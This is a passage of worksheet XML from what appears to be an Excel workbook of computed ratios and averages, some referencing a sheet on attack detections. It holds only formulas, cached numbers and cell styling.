      <c r="AS103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="AT103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="AU103" s="518">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="AV103" s="518">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="AW103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="AX103" s="518">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="AY103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="AZ103" s="518">
        <f t="shared" si="126"/>
        <v>0.5</v>
      </c>
      <c r="BA103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="BB103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="BC103" s="518">
        <f t="shared" si="126"/>
        <v>0.6666666667</v>
      </c>
      <c r="BD103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="BE103" s="518">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="BF103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="BG103" s="518">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="BH103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="BI103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="BJ103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="BK103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="BL103" s="518">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="BM103" s="518">
        <f t="shared" si="126"/>
        <v>0.1725394897</v>
      </c>
      <c r="BN103" s="518">
        <f t="shared" si="126"/>
        <v>0.001930501931</v>
      </c>
      <c r="BO103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="BP103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="BQ103" s="518">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="BR103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="BS103" s="518">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="BT103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="BU103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="BV103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="BW103" s="518">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="BX103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="BY103" s="518">
        <f t="shared" si="126"/>
        <v>0.8888888889</v>
      </c>
      <c r="BZ103" s="518">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="CA103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="CB103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="CC103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="CD103" s="518">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="CE103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="CF103" s="518">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="CG103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="CH103" s="518">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="CI103" s="518">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="CJ103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="CK103" s="518">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="CL103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="CM103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="CN103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="CO103" s="518">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="CP103" s="518">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="CQ103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="CR103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="CS103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="CT103" s="518">
        <f t="shared" si="126"/>
        <v>0.005988023952</v>
      </c>
      <c r="CU103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="CV103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="CW103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="CX103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="CY103" s="518">
        <f t="shared" si="126"/>
        <v>0.5</v>
      </c>
      <c r="CZ103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="DA103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="DB103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="DC103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="DD103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="DE103" s="518">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="DF103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="DG103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="DH103" s="518">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="DI103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="DJ103" s="519">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="DK103" s="271"/>
      <c r="DO103" s="279"/>
      <c r="DP103" s="271"/>
      <c r="DU103" s="271"/>
      <c r="DV103" s="271"/>
      <c r="EA103" s="271"/>
      <c r="EB103" s="271"/>
      <c r="EC103" s="271"/>
      <c r="ED103" s="280"/>
      <c r="EG103" s="279"/>
      <c r="EH103" s="271"/>
      <c r="EI103" s="271"/>
      <c r="EJ103" s="271"/>
      <c r="EK103" s="271"/>
      <c r="EL103" s="271"/>
      <c r="EM103" s="271"/>
      <c r="ER103" s="271"/>
      <c r="ES103" s="271"/>
      <c r="ET103" s="271"/>
      <c r="EU103" s="271"/>
      <c r="EV103" s="271"/>
      <c r="EW103" s="271"/>
      <c r="EX103" s="271"/>
      <c r="EY103" s="271"/>
      <c r="EZ103" s="271"/>
      <c r="FA103" s="280"/>
    </row>
    <row r="104">
      <c r="J104" s="277"/>
      <c r="K104" s="524" t="s">
        <v>2597</v>
      </c>
      <c r="L104" s="292"/>
      <c r="M104" s="292"/>
      <c r="N104" s="293"/>
      <c r="O104" s="278"/>
      <c r="Q104" s="271"/>
      <c r="R104" s="352" t="s">
        <v>2574</v>
      </c>
      <c r="S104" s="501">
        <f t="shared" ref="S104:V104" si="127">S56/S$30</f>
        <v>0.0004401731348</v>
      </c>
      <c r="T104" s="501">
        <f t="shared" si="127"/>
        <v>0.000001424625217</v>
      </c>
      <c r="U104" s="501">
        <f t="shared" si="127"/>
        <v>0.119047619</v>
      </c>
      <c r="V104" s="501">
        <f t="shared" si="127"/>
        <v>0.4210526316</v>
      </c>
      <c r="W104" s="501">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="X104" s="501">
        <f t="shared" ref="X104:AF104" si="128">X56/X$30</f>
        <v>0.1428571429</v>
      </c>
      <c r="Y104" s="501">
        <f t="shared" si="128"/>
        <v>56.57142857</v>
      </c>
      <c r="Z104" s="501">
        <f t="shared" si="128"/>
        <v>0.8725362918</v>
      </c>
      <c r="AA104" s="501">
        <f t="shared" si="128"/>
        <v>0.04322766571</v>
      </c>
      <c r="AB104" s="501">
        <f t="shared" si="128"/>
        <v>0.8695652174</v>
      </c>
      <c r="AC104" s="501">
        <f t="shared" si="128"/>
        <v>2.4</v>
      </c>
      <c r="AD104" s="501">
        <f t="shared" si="128"/>
        <v>0.0003149175053</v>
      </c>
      <c r="AE104" s="501">
        <f t="shared" si="128"/>
        <v>4.111111111</v>
      </c>
      <c r="AF104" s="502">
        <f t="shared" si="128"/>
        <v>0.001650021711</v>
      </c>
      <c r="AG104" s="271"/>
      <c r="AH104" s="352" t="s">
        <v>2574</v>
      </c>
      <c r="AI104" s="518">
        <f t="shared" ref="AI104:DJ104" si="129">IF(AI$30=0,"-",AI56/AI$30)</f>
        <v>0.0003669724771</v>
      </c>
      <c r="AJ104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="AK104" s="518">
        <f t="shared" si="129"/>
        <v>0.25</v>
      </c>
      <c r="AL104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="AM104" s="518">
        <f t="shared" si="129"/>
        <v>0.000001424625217</v>
      </c>
      <c r="AN104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="AO104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="AP104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="AQ104" s="518">
        <f t="shared" si="129"/>
        <v>0.01709401709</v>
      </c>
      <c r="AR104" s="518">
        <f t="shared" si="129"/>
        <v>1</v>
      </c>
      <c r="AS104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="AT104" s="518">
        <f t="shared" si="129"/>
        <v>3</v>
      </c>
      <c r="AU104" s="518">
        <f t="shared" si="129"/>
        <v>2</v>
      </c>
      <c r="AV104" s="518">
        <f t="shared" si="129"/>
        <v>1</v>
      </c>
      <c r="AW104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="AX104" s="518">
        <f t="shared" si="129"/>
        <v>0.5</v>
      </c>
      <c r="AY104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="AZ104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="BA104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="BB104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="BC104" s="518">
        <f t="shared" si="129"/>
        <v>0.3333333333</v>
      </c>
      <c r="BD104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="BE104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="BF104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="BG104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="BH104" s="518">
        <f t="shared" si="129"/>
        <v>396</v>
      </c>
      <c r="BI104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="BJ104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="BK104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="BL104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="BM104" s="518">
        <f t="shared" si="129"/>
        <v>0.1859052248</v>
      </c>
      <c r="BN104" s="518">
        <f t="shared" si="129"/>
        <v>1.309073359</v>
      </c>
      <c r="BO104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="BP104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="BQ104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="BR104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="BS104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="BT104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="BU104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="BV104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="BW104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="BX104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="BY104" s="518">
        <f t="shared" si="129"/>
        <v>0.1111111111</v>
      </c>
      <c r="BZ104" s="518">
        <f t="shared" si="129"/>
        <v>0.08130081301</v>
      </c>
      <c r="CA104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="CB104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="CC104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="CD104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="CE104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="CF104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="CG104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="CH104" s="518">
        <f t="shared" si="129"/>
        <v>1</v>
      </c>
      <c r="CI104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="CJ104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="CK104" s="518">
        <f t="shared" si="129"/>
        <v>8</v>
      </c>
      <c r="CL104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="CM104" s="518">
        <f t="shared" si="129"/>
        <v>1.5</v>
      </c>
      <c r="CN104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="CO104" s="518">
        <f t="shared" si="129"/>
        <v>0.1666666667</v>
      </c>
      <c r="CP104" s="518">
        <f t="shared" si="129"/>
        <v>11.5</v>
      </c>
      <c r="CQ104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="CR104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="CS104" s="518">
        <f t="shared" si="129"/>
        <v>0.0002915451895</v>
      </c>
      <c r="CT104" s="518">
        <f t="shared" si="129"/>
        <v>0.001996007984</v>
      </c>
      <c r="CU104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="CV104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="CW104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="CX104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="CY104" s="518">
        <f t="shared" si="129"/>
        <v>16</v>
      </c>
      <c r="CZ104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="DA104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="DB104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="DC104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="DD104" s="518">
        <f t="shared" si="129"/>
        <v>5</v>
      </c>
      <c r="DE104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DF104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DG104" s="518" t="str">
        <f t="shared" si="129"/>
        <v>-</v>
      </c>
      <c r="DH104" s="518">
        <f t="shared" si="129"/>
        <v>0.04</v>
      </c>
      <c r="DI104" s="518">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DJ104" s="519">
        <f t="shared" si="129"/>
        <v>0.09090909091</v>
      </c>
      <c r="DK104" s="271"/>
      <c r="DO104" s="279"/>
      <c r="DP104" s="271"/>
      <c r="DQ104" s="271"/>
      <c r="DR104" s="271"/>
      <c r="DS104" s="271"/>
      <c r="DT104" s="271"/>
      <c r="DU104" s="271"/>
      <c r="DV104" s="271"/>
      <c r="DW104" s="271"/>
      <c r="DX104" s="271"/>
      <c r="DY104" s="271"/>
      <c r="DZ104" s="271"/>
      <c r="EA104" s="271"/>
      <c r="EB104" s="271"/>
      <c r="EC104" s="271"/>
      <c r="ED104" s="280"/>
      <c r="EG104" s="279"/>
      <c r="EH104" s="271"/>
      <c r="EI104" s="271"/>
      <c r="EJ104" s="271"/>
      <c r="EK104" s="271"/>
      <c r="EL104" s="271"/>
      <c r="EM104" s="271"/>
      <c r="ER104" s="271"/>
      <c r="ES104" s="271"/>
      <c r="ET104" s="271"/>
      <c r="EU104" s="271"/>
      <c r="EV104" s="271"/>
      <c r="EW104" s="271"/>
      <c r="EX104" s="271"/>
      <c r="EY104" s="271"/>
      <c r="EZ104" s="271"/>
      <c r="FA104" s="280"/>
    </row>
    <row r="105">
      <c r="J105" s="277"/>
      <c r="K105" s="497" t="s">
        <v>2598</v>
      </c>
      <c r="L105" s="498" t="s">
        <v>2599</v>
      </c>
      <c r="M105" s="498" t="s">
        <v>2600</v>
      </c>
      <c r="N105" s="499" t="s">
        <v>2601</v>
      </c>
      <c r="O105" s="278"/>
      <c r="Q105" s="271"/>
      <c r="R105" s="352" t="s">
        <v>2575</v>
      </c>
      <c r="S105" s="501">
        <f t="shared" ref="S105:V105" si="130">S57/S$30</f>
        <v>0.271513462</v>
      </c>
      <c r="T105" s="501">
        <f t="shared" si="130"/>
        <v>0.004526034314</v>
      </c>
      <c r="U105" s="501">
        <f t="shared" si="130"/>
        <v>1.007936508</v>
      </c>
      <c r="V105" s="501">
        <f t="shared" si="130"/>
        <v>2.105263158</v>
      </c>
      <c r="W105" s="501">
        <f t="shared" si="104"/>
        <v>13</v>
      </c>
      <c r="X105" s="501">
        <f t="shared" ref="X105:AF105" si="131">X57/X$30</f>
        <v>0.1428571429</v>
      </c>
      <c r="Y105" s="501">
        <f t="shared" si="131"/>
        <v>59.28571429</v>
      </c>
      <c r="Z105" s="501">
        <f t="shared" si="131"/>
        <v>18.82308509</v>
      </c>
      <c r="AA105" s="501">
        <f t="shared" si="131"/>
        <v>0.1066282421</v>
      </c>
      <c r="AB105" s="501">
        <f t="shared" si="131"/>
        <v>8.782608696</v>
      </c>
      <c r="AC105" s="501">
        <f t="shared" si="131"/>
        <v>5.1</v>
      </c>
      <c r="AD105" s="501">
        <f t="shared" si="131"/>
        <v>0.01111795714</v>
      </c>
      <c r="AE105" s="501">
        <f t="shared" si="131"/>
        <v>4.777777778</v>
      </c>
      <c r="AF105" s="502">
        <f t="shared" si="131"/>
        <v>0.5214937039</v>
      </c>
      <c r="AG105" s="271"/>
      <c r="AH105" s="352" t="s">
        <v>2575</v>
      </c>
      <c r="AI105" s="518">
        <f t="shared" ref="AI105:DJ105" si="132">IF(AI$30=0,"-",AI57/AI$30)</f>
        <v>0.2711926606</v>
      </c>
      <c r="AJ105" s="518">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="AK105" s="518">
        <f t="shared" si="132"/>
        <v>1.5</v>
      </c>
      <c r="AL105" s="518">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="AM105" s="518">
        <f t="shared" si="132"/>
        <v>0.004526034314</v>
      </c>
      <c r="AN105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="AO105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="AP105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="AQ105" s="518">
        <f t="shared" si="132"/>
        <v>0.9230769231</v>
      </c>
      <c r="AR105" s="518">
        <f t="shared" si="132"/>
        <v>1.25</v>
      </c>
      <c r="AS105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="AT105" s="518">
        <f t="shared" si="132"/>
        <v>3</v>
      </c>
      <c r="AU105" s="518">
        <f t="shared" si="132"/>
        <v>3.5</v>
      </c>
      <c r="AV105" s="518">
        <f t="shared" si="132"/>
        <v>2</v>
      </c>
      <c r="AW105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="AX105" s="518">
        <f t="shared" si="132"/>
        <v>1.625</v>
      </c>
      <c r="AY105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="AZ105" s="518">
        <f t="shared" si="132"/>
        <v>0.5</v>
      </c>
      <c r="BA105" s="518">
        <f t="shared" si="132"/>
        <v>13</v>
      </c>
      <c r="BB105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="BC105" s="518">
        <f t="shared" si="132"/>
        <v>0.3333333333</v>
      </c>
      <c r="BD105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="BE105" s="518">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="BF105" s="518">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="BG105" s="518">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="BH105" s="518">
        <f t="shared" si="132"/>
        <v>396</v>
      </c>
      <c r="BI105" s="518">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="BJ105" s="518">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="BK105" s="518">
        <f t="shared" si="132"/>
        <v>6.333333333</v>
      </c>
      <c r="BL105" s="518">
        <f t="shared" si="132"/>
        <v>1</v>
      </c>
      <c r="BM105" s="518">
        <f t="shared" si="132"/>
        <v>45.66676792</v>
      </c>
      <c r="BN105" s="518">
        <f t="shared" si="132"/>
        <v>1.766795367</v>
      </c>
      <c r="BO105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="BP105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="BQ105" s="518">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="BR105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="BS105" s="518">
        <f t="shared" si="132"/>
        <v>4.5</v>
      </c>
      <c r="BT105" s="518">
        <f t="shared" si="132"/>
        <v>2</v>
      </c>
      <c r="BU105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="BV105" s="518">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="BW105" s="518">
        <f t="shared" si="132"/>
        <v>4</v>
      </c>
      <c r="BX105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="BY105" s="518">
        <f t="shared" si="132"/>
        <v>0.1111111111</v>
      </c>
      <c r="BZ105" s="518">
        <f t="shared" si="132"/>
        <v>0.08130081301</v>
      </c>
      <c r="CA105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="CB105" s="518">
        <f t="shared" si="132"/>
        <v>1</v>
      </c>
      <c r="CC105" s="518">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="CD105" s="518">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="CE105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="CF105" s="518">
        <f t="shared" si="132"/>
        <v>3</v>
      </c>
      <c r="CG105" s="518">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="CH105" s="518">
        <f t="shared" si="132"/>
        <v>1</v>
      </c>
      <c r="CI105" s="518">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="CJ105" s="518">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="CK105" s="518">
        <f t="shared" si="132"/>
        <v>13</v>
      </c>
      <c r="CL105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="CM105" s="518">
        <f t="shared" si="132"/>
        <v>81</v>
      </c>
      <c r="CN105" s="518">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="CO105" s="518">
        <f t="shared" si="132"/>
        <v>1.333333333</v>
      </c>
      <c r="CP105" s="518">
        <f t="shared" si="132"/>
        <v>20</v>
      </c>
      <c r="CQ105" s="518">
        <f t="shared" si="132"/>
        <v>3</v>
      </c>
      <c r="CR105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="CS105" s="518">
        <f t="shared" si="132"/>
        <v>0.01109260031</v>
      </c>
      <c r="CT105" s="518">
        <f t="shared" si="132"/>
        <v>0.003992015968</v>
      </c>
      <c r="CU105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="CV105" s="518">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="CW105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="CX105" s="518">
        <f t="shared" si="132"/>
        <v>4.5</v>
      </c>
      <c r="CY105" s="518">
        <f t="shared" si="132"/>
        <v>16</v>
      </c>
      <c r="CZ105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="DA105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="DB105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="DC105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="DD105" s="518">
        <f t="shared" si="132"/>
        <v>5</v>
      </c>
      <c r="DE105" s="518">
        <f t="shared" si="132"/>
        <v>1.2</v>
      </c>
      <c r="DF105" s="518">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="DG105" s="518" t="str">
        <f t="shared" si="132"/>
        <v>-</v>
      </c>
      <c r="DH105" s="518">
        <f t="shared" si="132"/>
        <v>1.053333333</v>
      </c>
      <c r="DI105" s="518">
        <f t="shared" si="132"/>
        <v>0.4980548267</v>
      </c>
      <c r="DJ105" s="519">
        <f t="shared" si="132"/>
        <v>1.181818182</v>
      </c>
      <c r="DK105" s="271"/>
      <c r="DO105" s="279"/>
      <c r="DP105" s="271"/>
      <c r="DQ105" s="271"/>
      <c r="DR105" s="271"/>
      <c r="DS105" s="271"/>
      <c r="DT105" s="271"/>
      <c r="DU105" s="271"/>
      <c r="DV105" s="271"/>
      <c r="DW105" s="271"/>
      <c r="DX105" s="271"/>
      <c r="DY105" s="271"/>
      <c r="DZ105" s="271"/>
      <c r="EA105" s="271"/>
      <c r="EB105" s="271"/>
      <c r="EC105" s="271"/>
      <c r="ED105" s="280"/>
      <c r="EG105" s="279"/>
      <c r="EH105" s="271"/>
      <c r="EI105" s="271"/>
      <c r="EJ105" s="271"/>
      <c r="EK105" s="271"/>
      <c r="EL105" s="271"/>
      <c r="EM105" s="271"/>
      <c r="ER105" s="271"/>
      <c r="ES105" s="271"/>
      <c r="ET105" s="271"/>
      <c r="EU105" s="271"/>
      <c r="EV105" s="271"/>
      <c r="EW105" s="271"/>
      <c r="EX105" s="271"/>
      <c r="EY105" s="271"/>
      <c r="EZ105" s="271"/>
      <c r="FA105" s="280"/>
    </row>
    <row r="106">
      <c r="J106" s="277"/>
      <c r="K106" s="500">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!BL3:BL139)</f>
        <v>2.213838631</v>
      </c>
      <c r="L106" s="501">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!DB3:DB139)</f>
        <v>350.8444998</v>
      </c>
      <c r="M106" s="501">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!ER3:ER139)</f>
        <v>406.6610744</v>
      </c>
      <c r="N106" s="502">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!GH3:GH139)</f>
        <v>1738.668247</v>
      </c>
      <c r="O106" s="278"/>
      <c r="Q106" s="271"/>
      <c r="R106" s="352" t="s">
        <v>2576</v>
      </c>
      <c r="S106" s="501">
        <f t="shared" ref="S106:V106" si="133">S58/S$30</f>
        <v>0.2718069107</v>
      </c>
      <c r="T106" s="501">
        <f t="shared" si="133"/>
        <v>0.004526034314</v>
      </c>
      <c r="U106" s="501">
        <f t="shared" si="133"/>
        <v>1.087301587</v>
      </c>
      <c r="V106" s="501">
        <f t="shared" si="133"/>
        <v>2.315789474</v>
      </c>
      <c r="W106" s="501">
        <f t="shared" si="104"/>
        <v>14</v>
      </c>
      <c r="X106" s="501">
        <f t="shared" ref="X106:AF106" si="134">X58/X$30</f>
        <v>7065.428571</v>
      </c>
      <c r="Y106" s="501">
        <f t="shared" si="134"/>
        <v>60.42857143</v>
      </c>
      <c r="Z106" s="501">
        <f t="shared" si="134"/>
        <v>19.39537354</v>
      </c>
      <c r="AA106" s="501">
        <f t="shared" si="134"/>
        <v>1.195965418</v>
      </c>
      <c r="AB106" s="501">
        <f t="shared" si="134"/>
        <v>10.73913043</v>
      </c>
      <c r="AC106" s="501">
        <f t="shared" si="134"/>
        <v>5.9</v>
      </c>
      <c r="AD106" s="501">
        <f t="shared" si="134"/>
        <v>0.01115903334</v>
      </c>
      <c r="AE106" s="501">
        <f t="shared" si="134"/>
        <v>5.222222222</v>
      </c>
      <c r="AF106" s="502">
        <f t="shared" si="134"/>
        <v>0.5220147634</v>
